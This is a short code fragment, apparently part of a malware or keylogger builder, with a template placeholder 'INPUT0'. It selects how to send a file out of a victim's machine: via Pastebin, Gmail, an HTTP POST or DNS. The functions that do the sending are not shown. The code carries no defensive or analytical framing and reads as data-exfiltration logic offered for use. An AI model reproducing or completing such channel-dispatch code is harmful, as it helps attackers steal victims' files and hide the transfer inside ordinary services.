 if ("INPUT0" == "pastebin")
  {
    pastebin(fn);
  }
  else if ("INPUT0" == "gmail")
  {
    if (fp != "")
    {
        gmail(fn,fp);
    }
    else
    {
        gmail(fn,"no");
    }
  }
  else if ("INPUT0" == "post")
  {
    hpost(fn);
  }
  else if ("INPUT0" == "dns")
  {
    dns(fn);
  }